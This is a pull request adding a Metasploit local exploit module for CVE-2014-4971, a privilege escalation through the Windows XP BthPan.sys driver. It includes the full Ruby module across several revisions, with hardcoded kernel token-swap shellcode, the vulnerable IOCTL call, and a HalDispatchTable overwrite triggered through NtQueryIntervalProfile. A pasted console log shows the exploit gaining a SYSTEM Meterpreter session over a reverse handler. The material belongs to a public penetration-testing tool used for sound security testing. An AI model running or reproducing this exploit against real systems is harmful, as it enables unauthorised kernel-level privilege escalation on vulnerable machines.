### PR TITLE
Cve 2014 4971 bthpan exploit

### DIFF
--- a/modules/exploits/windows/local/bthpan.rb
+++ b/modules/exploits/windows/local/bthpan.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::File
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::Priv
@@ -39,8 +41,15 @@ class Metasploit3 < Msf::Exploit::Local
         },
       'Targets'       =>
         [
-          [ 'Automatic', {} ],
-          [ 'Windows XP SP3', {} ]
+          ['Windows XP SP3',
+           {
+             'HaliQuerySystemInfo' => 0x16bba,
+             '_KPROCESS'  => "\x44",
+             '_TOKEN'     => "\xc8",
+             '_UPID'      => "\x84",
+             '_APLINKS'   => "\x88"
+           }
+          ]
         ],
       'References'    =>
         [
@@ -52,60 +61,6 @@ class Metasploit3 < Msf::Exploit::Local
     ))
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
-  def open_device(dev)
-    invalid_handle_value = 0xFFFFFFFF
-
-    r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
-
-    handle = r['return']
-
-    if handle == invalid_handle_value
-      return nil
-    else
-      return handle
-    end
-  end
-
-  # @return [Array, nil] the address and driver name or nil
-  #   if the driver name of 'krnl' isn't found
-  def find_sys_base
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
-    driver_array = nil
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0, results['return']]
-      if current_drvname.downcase.include?('krnl')
-        driver_array = [address, current_drvname]
-        break
-      end
-    end
-
-    return driver_array
-  end
 
   def ring0_shellcode
     tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
@@ -124,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     unless proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
@@ -146,41 +101,28 @@ class Metasploit3 < Msf::Exploit::Local
   def disclose_addresses(t)
     addresses = {}
 
-    vprint_status("Getting the Kernel module name...")
-    kernel_info = find_sys_base
-    unless kernel_info
-      vprint_error("Failed to disclose the Kernel module name")
+    hal_dispatch_table = find_haldispatchtable
+    return nil if hal_dispatch_table.nil?
+    addresses['halDispatchTable'] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
+
+    vprint_status('Getting the hal.dll base address...')
+    hal_info = find_sys_base('hal.dll')
+    if hal_info.nil?
+      vprint_error('Failed to disclose hal.dll base address')
       return nil
     end
-    vprint_good("Kernel module found: #{kernel_info[1]}")
+    hal_base = hal_info[0]
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
 
-    vprint_status("Getting a Kernel handle...")
-    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    kernel32_handle = kernel32_handle['return']
-    if kernel32_handle == 0
-      vprint_error("Failed to get a Kernel handle")
-      return nil
-    end
-    vprint_good("Kernel handle acquired")
+    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
+    addresses['HaliQuerySystemInfo'] = hali_query_system_information
 
-    vprint_status("Disclosing the HalDispatchTable...")
-    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
-    hal_dispatch_table = hal_dispatch_table['return']
-    if hal_dispatch_table == 0
-      vprint_error("Failed to disclose the HalDispatchTable")
-      return nil
-    end
-    hal_dispatch_table -= kernel32_handle
-    hal_dispatch_table += kernel_info[0]
-    addresses["halDispatchTable"] = hal_dispatch_table
-    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
-
-    return addresses
+    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
+    addresses
   end
 
   def check
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Safe
     end
@@ -188,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
     os = sysinfo["OS"]
     return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
 
-    handle = open_device("\\\\.\\bthpan")
+    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     return Exploit::CheckCode::Safe unless handle
 
     session.railgun.kernel32.CloseHandle(handle)
@@ -205,17 +147,17 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    handle = open_device("\\\\.\\bthpan")
+    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
       fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
     end
 
-    my_target = targets[1]
+    my_target = targets[0]
     print_status("Disclosing the HalDispatchTable address...")
     @addresses = disclose_addresses(my_target)
     if @addresses.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
+      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
     else
       print_good("Address successfully disclosed.")
     end

--- a/modules/exploits/windows/local/bthpan.rb
+++ b/modules/exploits/windows/local/bthpan.rb
@@ -14,12 +14,13 @@ class Metasploit3 < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'          => 'BthPan.sys Privilege Escalation',
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
       'Description'    => %q{
-        A vulnerability within BthPan module allows an attacker to inject memory they control
-        into an arbitrary location they define. This can be used by an attacker to overwrite
+        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
+        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
+        into an arbitrary location. This can be used by an attacker to overwrite
         HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
         NtQueryIntervalProfile.
       },
@@ -34,26 +35,25 @@ class Metasploit3 < Msf::Exploit::Local
       'SessionTypes'  => [ 'meterpreter' ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Targets'       =>
         [
-          [ 'Automatic', { } ],
-          [ 'Windows XP SP3', { } ],
+          [ 'Automatic', {} ],
+          [ 'Windows XP SP3', {} ]
         ],
       'References'    =>
         [
-          [ 'CVE', 'CVE-2014-4971' ],
+          [ 'CVE', '2014-4971' ],
           [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ]
         ],
-      'DisclosureDate'=> 'Jul 18 2014',
-      'DefaultTarget' => 0
-    }))
-
+      'DisclosureDate' => 'Jul 18 2014',
+      'DefaultTarget'  => 0
+    ))
   end
 
   def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',
       'EnumDeviceDrivers',
@@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def open_device(dev)
-
     invalid_handle_value = 0xFFFFFFFF
 
     r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
@@ -84,24 +83,28 @@ class Metasploit3 < Msf::Exploit::Local
 
     if handle == invalid_handle_value
       return nil
+    else
+      return handle
     end
-
-    return handle
   end
 
+  # @return [Array, nil] the address and driver name or nil
+  #   if the driver name of 'krnl' isn't found
   def find_sys_base
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
     addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
+    driver_array = nil
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0, results['return']]
       if current_drvname.downcase.include?('krnl')
-        return [address, current_drvname]
+        driver_array = [address, current_drvname]
+        break
       end
     end
 
-    return nil
+    return driver_array
   end
 
   def ring0_shellcode
@@ -118,14 +121,12 @@ class Metasploit3 < Msf::Exploit::Local
     tokenswap << "\x39\x98\x84\x00\x00\x00"
     tokenswap << "\x75\xED\x89\xB8\xC8"
     tokenswap << "\x00\x00\x00\x61\xC3"
-
-    return tokenswap
   end
 
   def fill_memory(proc, address, length, content)
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
-    if not proc.memory.writable?(address)
+    unless proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
       return nil
     end
@@ -147,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     vprint_status("Getting the Kernel module name...")
     kernel_info = find_sys_base
-    if kernel_info.nil?
+    unless kernel_info
       vprint_error("Failed to disclose the Kernel module name")
       return nil
     end
@@ -180,19 +181,16 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     add_railgun_functions
 
-    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Safe
     end
 
     os = sysinfo["OS"]
-    unless (os =~ /windows xp.*service pack 3/i)
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
 
     handle = open_device("\\\\.\\bthpan")
-    if handle.nil?
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Safe unless handle
+
     session.railgun.kernel32.CloseHandle(handle)
 
     return Exploit::CheckCode::Vulnerable
@@ -239,26 +237,24 @@ class Metasploit3 < Msf::Exploit::Local
     print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
 
     print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
-    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
     session.railgun.kernel32.CloseHandle(handle)
 
     print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
-    result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
+    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
 
     print_status("Checking privileges after exploitation...")
 
-    if not is_system?
+    unless is_system?
       fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
     end
     print_good("Privilege escalation successful!")
 
     p = payload.encoded
-    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
-    if !execute_shellcode(p)
+    print_status("Injecting #{p.length} bytes to memory and executing it...")
+    unless execute_shellcode(p)
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
-
   end
-
 end
 

--- a/modules/exploits/windows/local/bthpan.rb
+++ b/modules/exploits/windows/local/bthpan.rb
@@ -89,18 +89,14 @@ class Metasploit3 < Msf::Exploit::Local
     return handle
   end
 
-  def find_sys_base(drvname)
+  def find_sys_base
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
     addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0, results['return']]
-      if drvname == nil
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == current_drvname
+      if current_drvname.downcase.include?('krnl')
         return [address, current_drvname]
       end
     end
@@ -108,8 +104,7 @@ class Metasploit3 < Msf::Exploit::Local
     return nil
   end
 
-  def ring0_shellcode(t)
-
+  def ring0_shellcode
     tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
     tokenswap << "\x8B\x40\x44\x50\xBB\x04"
     tokenswap << "\x00\x00\x00\x8B\x80\x88"
@@ -117,37 +112,32 @@ class Metasploit3 < Msf::Exploit::Local
     tokenswap << "\x00\x00\x00\x39\x98\x84"
     tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
     tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
-    tokenswap << "\x41\x41\x41\x41"
+    tokenswap << [session.sys.process.getpid].pack('V')
     tokenswap << "\x8B\x80\x88\x00\x00\x00"
     tokenswap << "\x2D\x88\x00\x00\x00"
     tokenswap << "\x39\x98\x84\x00\x00\x00"
     tokenswap << "\x75\xED\x89\xB8\xC8"
     tokenswap << "\x00\x00\x00\x61\xC3"
 
-    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('V'))
-
     return tokenswap
   end
 
   def fill_memory(proc, address, length, content)
-
     result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
       return nil
-    else
-      vprint_good("#{address} is now writable")
     end
+    vprint_good("#{address} is now writable")
 
     result = proc.memory.write(address, content)
 
     if result.nil?
       vprint_error("Failed to write contents to memory")
       return nil
-    else
-      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
     end
+    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
 
     return address
   end
@@ -156,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Local
     addresses = {}
 
     vprint_status("Getting the Kernel module name...")
-    kernel_info = find_sys_base(nil)
+    kernel_info = find_sys_base
     if kernel_info.nil?
       vprint_error("Failed to disclose the Kernel module name")
       return nil
@@ -194,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local
       return Exploit::CheckCode::Safe
     end
 
+    os = sysinfo["OS"]
+    unless (os =~ /windows xp.*service pack 3/i)
+      return Exploit::CheckCode::Safe
+    end
+
     handle = open_device("\\\\.\\bthpan")
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
-
-    os = sysinfo["OS"]
-    unless (os =~ /windows xp.*service pack 3/i)
-      return Exploit::CheckCode::Safe
-    end
 
     return Exploit::CheckCode::Vulnerable
   end
@@ -211,12 +201,6 @@ class Metasploit3 < Msf::Exploit::Local
   def exploit
     if is_system?
       fail_with(Exploit::Failure::None, 'Session is already elevated')
-    end
-
-    if sysinfo["Architecture"] =~ /wow64/i
-      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
-    elsif sysinfo["Architecture"] =~ /x64/
-      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
     unless check == Exploit::CheckCode::Vulnerable
@@ -240,7 +224,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Storing the shellcode in memory...")
     this_proc = session.sys.process.open
-    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell = ring0_shellcode
     kernel_shell_address = 0x1
 
     buf = "\x90" * 0x6000
@@ -251,9 +235,8 @@ class Metasploit3 < Msf::Exploit::Local
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
       fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
-    else
-      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
     end
+    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
 
     print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
     ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
@@ -265,16 +248,13 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Checking privileges after exploitation...")
 
     if not is_system?
-      fail_with(Failure::Unknown, "The exploitation wasn't successful")
-    else
-      print_good("Exploitation successful!")
+      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
     end
+    print_good("Privilege escalation successful!")
 
     p = payload.encoded
     print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
-    if execute_shellcode(p)
-      print_good("Enjoy")
-    else
+    if !execute_shellcode(p)
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
 

--- a/modules/exploits/windows/local/bthpan.rb
+++ b/modules/exploits/windows/local/bthpan.rb
@@ -1,0 +1,284 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'BthPan.sys Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within BthPan module allows an attacker to inject memory they control
+        into an arbitrary location they define. This can be used by an attacker to overwrite
+        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
+        NtQueryIntervalProfile.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          [ 'Automatic', { } ],
+          [ 'Windows XP SP3', { } ],
+        ],
+      'References'    =>
+        [
+          [ 'CVE', 'CVE-2014-4971' ],
+          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ]
+        ],
+      'DisclosureDate'=> 'Jul 18 2014',
+      'DefaultTarget' => 0
+    }))
+
+  end
+
+  def add_railgun_functions
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function(
+      'psapi',
+      'EnumDeviceDrivers',
+      'BOOL',
+      [
+        ["PBLOB", "lpImageBase", "out"],
+        ["DWORD", "cb", "in"],
+        ["PDWORD", "lpcbNeeded", "out"]
+      ])
+    session.railgun.add_function(
+      'psapi',
+      'GetDeviceDriverBaseNameA',
+      'DWORD',
+      [
+        ["LPVOID", "ImageBase", "in"],
+        ["PBLOB", "lpBaseName", "out"],
+        ["DWORD", "nSize", "in"]
+      ])
+  end
+
+  def open_device(dev)
+
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      return nil
+    end
+
+    return handle
+  end
+
+  def find_sys_base(drvname)
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0, results['return']]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == current_drvname
+        return [address, current_drvname]
+      end
+    end
+
+    return nil
+  end
+
+  def ring0_shellcode(t)
+
+    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
+    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
+    tokenswap << "\x00\x00\x00\x8B\x80\x88"
+    tokenswap << "\x00\x00\x00\x2D\x88"
+    tokenswap << "\x00\x00\x00\x39\x98\x84"
+    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    tokenswap << "\x41\x41\x41\x41"
+    tokenswap << "\x8B\x80\x88\x00\x00\x00"
+    tokenswap << "\x2D\x88\x00\x00\x00"
+    tokenswap << "\x39\x98\x84\x00\x00\x00"
+    tokenswap << "\x75\xED\x89\xB8\xC8"
+    tokenswap << "\x00\x00\x00\x61\xC3"
+
+    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('V'))
+
+    return tokenswap
+  end
+
+  def fill_memory(proc, address, length, content)
+
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+
+    if not proc.memory.writable?(address)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("#{address} is now writable")
+    end
+
+    result = proc.memory.write(address, content)
+
+    if result.nil?
+      vprint_error("Failed to write contents to memory")
+      return nil
+    else
+      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
+    end
+
+    return address
+  end
+
+  def disclose_addresses(t)
+    addresses = {}
+
+    vprint_status("Getting the Kernel module name...")
+    kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      vprint_error("Failed to disclose the Kernel module name")
+      return nil
+    end
+    vprint_good("Kernel module found: #{kernel_info[1]}")
+
+    vprint_status("Getting a Kernel handle...")
+    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    kernel32_handle = kernel32_handle['return']
+    if kernel32_handle == 0
+      vprint_error("Failed to get a Kernel handle")
+      return nil
+    end
+    vprint_good("Kernel handle acquired")
+
+    vprint_status("Disclosing the HalDispatchTable...")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
+    hal_dispatch_table = hal_dispatch_table['return']
+    if hal_dispatch_table == 0
+      vprint_error("Failed to disclose the HalDispatchTable")
+      return nil
+    end
+    hal_dispatch_table -= kernel32_handle
+    hal_dispatch_table += kernel_info[0]
+    addresses["halDispatchTable"] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
+
+    return addresses
+  end
+
+  def check
+    add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device("\\\\.\\bthpan")
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    os = sysinfo["OS"]
+    unless (os =~ /windows xp.*service pack 3/i)
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    handle = open_device("\\\\.\\bthpan")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
+    end
+
+    my_target = targets[1]
+    print_status("Disclosing the HalDispatchTable address...")
+    @addresses = disclose_addresses(my_target)
+    if @addresses.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
+    else
+      print_good("Address successfully disclosed.")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell_address = 0x1
+
+    buf = "\x90" * 0x6000
+    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
+    buf[0x5000, kernel_shell.length] = kernel_shell
+
+    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+    else
+      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
+    end
+
+    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
+    session.railgun.kernel32.CloseHandle(handle)
+
+    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
+
+    print_status("Checking privileges after exploitation...")
+
+    if not is_system?
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+    else
+      print_good("Exploitation successful!")
+    end
+
+    p = payload.encoded
+    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+    if execute_shellcode(p)
+      print_good("Enjoy")
+    else
+      fail_with(Failure::Unknown, "Error while executing the payload")
+    end
+
+  end
+
+end
+


### PR DESCRIPTION
Resubmitting after unwinding some repo breakage I caused - this is logically a continuation of closed PR #3563, including the style fixes from @todb-r7.

Up-to-date example in action, as requested by @todb:

<pre>msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.1:4445
msf exploit(handler) > [*] Starting the payload handler...
popm
msf exploit(bthpan) >
[*] Sending stage (769536 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.1:4445 -> 192.168.1.1:37139) at 2014-08-14 17:19:17 -0400

msf exploit(bthpan) > set SESSION 1
SESSION => 1
msf exploit(bthpan) > rexploit -j
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.1:4444
msf exploit(bthpan) > [*] Disclosing the HalDispatchTable address...
[+] Address successfully disclosed.
[*] Storing the shellcode in memory...
[+] Kernel stager successfully stored at 0x1
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Privilege escalation successful!
[*] Injecting 287 bytes to memory and executing it...
[*] Sending stage (769536 bytes) to 192.168.1.1
[*] Meterpreter session 2 opened (192.168.1.1:4444 -> 192.168.1.1:44076) at 2014-08-14 17:19:45 -0400

msf exploit(bthpan) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WCB614-J20\kore @ WCB614-J20      192.168.1.1:4445 -> 192.168.1.1:37139 (10.0.2.15)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WCB614-J20  192.168.1.1:4444 -> 192.168.1.1:44076 (10.0.2.15)
</pre>
